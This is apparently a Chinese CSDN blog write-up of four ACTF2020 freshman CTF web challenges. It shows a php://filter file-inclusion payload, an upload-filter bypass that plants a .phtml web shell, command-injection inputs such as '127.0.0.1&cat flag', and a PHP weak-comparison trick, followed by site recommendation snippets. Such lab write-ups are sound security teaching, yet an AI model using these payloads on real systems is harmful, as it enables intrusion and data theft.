ACTF2020 新生赛

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量423 收藏
点赞数
分类专栏: BUUCTF 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45882317/article/details/112135478
版权

0x01 Include

  • 源代码中发现文件包含
  • payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php

得到
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NThkODk3MTItYjVjNC00OWQwLWE1ZDgtOGZiYTk2YmZjNmI0fQo=
解base64:

<?php
echo "Can you find out the flag?";
//flag{58d89712-b5c4-49d0-a5d8-8fba96bfc6b4}

0x02 Upload

  • 随便上传,显示规则
    该文件不允许上传,请上传jpg,png.gi结尾的图片!
  • 发现是这是js检测,抓包绕过
  • 抓包上传后,回显更改名字的图片
    Upload Success! Look here~ ./uplo4d/f3ccdd27d2000e3f9255a7e3e2c48800.jpg
  • 测试其他扩展名,成功
    ./uplo4d/1406a3b458d663eb5c3e61b80d160948.phtml
  • 蚁剑连接成功,getFlag

0x03 EXEC

  • payload:
127.0.0.1&ls
index.php
PING 127.0.0.1 (127.0.0.1): 56 data bytes

127.0.0.1&ls /    //一般在根目录
flag
...
PING 127.0.0.1 (127.0.0.1): 56 data bytes

127.0.0.1&cat flag
flag{349cb578-b365-424c-9c69-a75fb8d5e757}
PING 127.0.0.1 (127.0.0.1): 56 data bytes

0x04 BackupFile

  • dirsearch扫描
    python ./dirsearch.py -u http://3dc3d80d-11ca-4257-a22f-e4c07996818b.node3.buuoj.cn/ -e * --threads=1 --delay=0.1

太快会429

  • 找到index.php.bak,打开
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {//是否为数字
        exit("Just num!");
    }
    $key = intval($key);//转化为整型
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {//弱类型比较,str变成123
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}
  • payloadbuuoj.cn/?key=123
ScyLamb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ACTF2020 新生 -- WP
会下雪的晴天
05-18 3079
做题思路记录,同时感谢赵师傅和Y1NG的环境与源码 文章目录[ACTF2020 新生]Include[ACTF2020 新生]Exec[ACTF2020 新生]BackupFile[ACTF2020 新生]Upload [ACTF2020 新生]Include 主页显示是一个链接,点进去看看,URL出现file=,结合题目判断为文件包含 用伪协议读flag.php,一般语句为php://filter/read=convert.base64-encode/resource=xxx php:/.
ctf include(文件包含漏洞)
weixin_64311421的博客
03-01 1114
不能不知道ctf比中的文件包含漏洞的题
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1114
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
BUUCTF之[ACTF2020 新生]BackupFile 解题过程
weixin_44632787的博客
06-18 4966
在PHP中: ==为弱相等,即当整数和字符串类型相比较时。会先将字符串转化为整数然后再进行比较。比如a=123和b=123admin456进行==比较时。则b会只截取前面的整数部分。即b=123。 所以,这里的a==b是返回True。
[ACTF新生2020]Universe_final_answer学习笔记
a5555678744的博客
02-10 619
[ACTF新生2020]Universe_final_answer 题目重述 熟练地打开main函数 程序的意思很明显:就是做一个判断,如果通过了就给你flag,但是可以看到,输出里面有两个%s而后面只有一个对应参量,这么说另一个隐藏起来的就不能单纯靠静态分析解决了。 关键函数 这里很显然sub_860是关键函数,只要它判断成功了,问题就得到解决了 这个乍一看挺吓人的,但是分析问题要先总体分析,这么一些v1-v10的参数,乘上参数线性组合得到一个值,这不就是矩阵吗?跟着这个思路,.
actf_2019_actfnote
doudoudedi
06-22 567
思路 通过溢出将topchunk的位置向上提然后申请堆块即可完成一次任意地址写入 exp: #!/usr/bin/python2 from pwn import * #p=process('./ACTF_2019_ACTFNOTE') p=remote('node3.buuoj.cn',26474) elf=ELF('./ACTF_2019_ACTFNOTE') libc=elf.libc def add(size,name,content): p.sendlineafter('$ ','1') p.
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成一个透明、可编程的灯光展示装置。这种技术广泛应用于艺术展览、舞台效果、广告展示等领域,因其独特的视觉效果和高度的可定制性而备受青睐。...
buuctf [ACTF新生2020]base64隐写
个人做题记录,大佬勿喷
12-30 540
第一个压缩包解压不了,然后解压第二个得到两个文件。用个脚本解压即可,这里用的是网上大佬们的。这个图片是公共号的二维码,没啥用。这个是base64隐写。
ctf文件包含
qq_52671379的博客
06-14 612
ctf文件包含 题目 鼓捣一下发现一个链接shell 意思是可通过ctfhub传值 看一下代码发现看到eval函数,将请求的参数作为命令执行。可是txt文件是无法利用的,所以想到刚才的index页面中,有一个include函数通过get提交,会将shell.txt的内容合并到index.php中,尝试post提交ctfhub的值,发现被执行了,然后输出了当下目录的文件。 Flag在文件file通过get传值会被include函数将文件的内容合并到index.php中 首先将文件给到shell.tet
[ACTF2020 新生]Include
m0_62092622的博客
04-22 3050
打开有个链接tips,再点进去发现一句话 Can you find out the flag? 而且后面传入一个参数是file=flag.php http://39f0e8ed-769a-4b4b-84d3-52367874da03.node4.buuoj.cn:81/?file=flag.php 而且题目名字是include,所以这肯定是一个文件包含漏洞的题 接下来我们学习一下伪协议 php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filt
fileclude-CTF 解题思路
m0_73734159的博客
04-26 1937
【代码】fileclude-CTF 解题思路。
CTF—[ACTF新生2020]outguess1
Jay
03-08 914
CTF—[ACTF新生2020]outguess1 1、通过数据查看 发现图片中的编码 2、 解密得到ABC CTF在线工具-在线核心价值观编码|核心价值观编码算法|Core Values Encoder 3、结合题目名字,对这张图片进行使用outguess导出隐写内容 安装教程:1、outguess下载安装_By Yang的博客-CSDN博客 4、得到flag : flag{gue33_Gu3Ss!2020}
BUUCTF--[ACTF新生2020]Oruga
Hk_Mayfly的博客
06-06 373
测试文件:https://lanzous.com/iPyvcddmqsh 代码分析 前22行代码实际就是告诉我们输入的前5个字符为"actf{" 主要分析sub_78A函数 byte_201020为: 00 00 00 00 23 00 00 00 00 00 00 00 23 23 23 2300 00 00 23 23 00 00 00 4F 4F 00 00 00 00 00 00...
浅谈CTF中的逻辑漏洞
PICACHU+++的博客
10-07 1285
逻辑漏洞主要是指程序逻辑上出现的问题,例如逻辑不严密或者逻辑太复杂,从而导致一些逻辑分支不能正常处理或处理错误,通常这类漏洞多以月权访问,密码爆破等等。
[ACTF2020 新生]Upload
m0_73612768的博客
12-02 358
文件保存在 ./uplo4d/bd914ca4997d34857501cefab0064162.phtml 路径下,蚁剑直接连就行。改后缀名为 .php ,发现上传失败,那就改后缀名为 phtml ,上传成功。查看源码,调用了一个 checkFile 函数,估计是前端校验。写一个一句话木马,后缀名改为 .jpg ,上传,抓包,
[actf2020 新生]include
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值